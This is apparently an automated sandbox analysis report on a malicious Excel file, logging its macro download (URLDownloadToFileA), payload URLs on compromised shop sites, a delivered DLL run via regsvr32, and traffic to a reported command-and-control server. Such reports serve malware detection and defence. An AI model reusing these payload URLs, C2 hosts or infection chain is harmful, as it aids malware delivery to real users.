                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 32MB

                      Networking

                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: sat7ate.com is down
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 15 Nov 2022 11:40:12 GMTContent-Type: application/x-msdownloadContent-Length: 769024Connection: keep-aliveX-Powered-By: PHP/7.3.0Set-Cookie: 63737a9ce6e7a=1668512412; expires=Tue, 15-Nov-2022 11:41:12 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Tue, 15 Nov 2022 11:40:12 GMTExpires: Tue, 15 Nov 2022 11:40:12 GMTContent-Disposition: attachment; filename="40hd04O0.dll"Content-Transfer-Encoding: binary
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: IP country count 21
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:10 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7u4EN7ldFY91oSo8hffAyJadQKSdMuXRfEPnyOP0LrcMPyEqQYzhnB8nK%2F56PKGV92LhwlADR0Cai9xEpKkyPgYTgxlYN3LtX9AYwD4O0bLpA%3D000115; expires=Mon, 05-Dec-2022 11:40:10 GMT; Max-Age=1728000; path=/; domain=www.spinbalence.com; secure; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:11 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Status: 404 Not FoundSet-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSftoVdV7kvSqSpdfLt4fdwNPMCppuBx0MZGFj5jTVvcGNOjxE63v9YLetElu6JEvu5ONuoJotfg%2BX0z1PXLVMbs%3D000115; expires=Mon, 05-Dec-2022 11:40:11 GMT; Max-Age=1728000; path=/; domain=www.3d-stickers.com; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: regsvr32.exe, 00000009.00000002.1210700367.00000000003E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151735990.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151526148.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/
                      Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.co
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: sat7ate.com
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025238 GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014B20 GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025C50 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,

                      E-Banking Fraud

                      Source: Yara match | File source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: 4470_02112022.xls | Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: 4470_02112022.xls | Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\oxnv4.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
                      Source: 4470_02112022.xls | Initial sample: EXEC
                      Source: 4470_02112022.xls | Initial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\SnILCOTnpOOFucYhP\
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800058C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D7F8
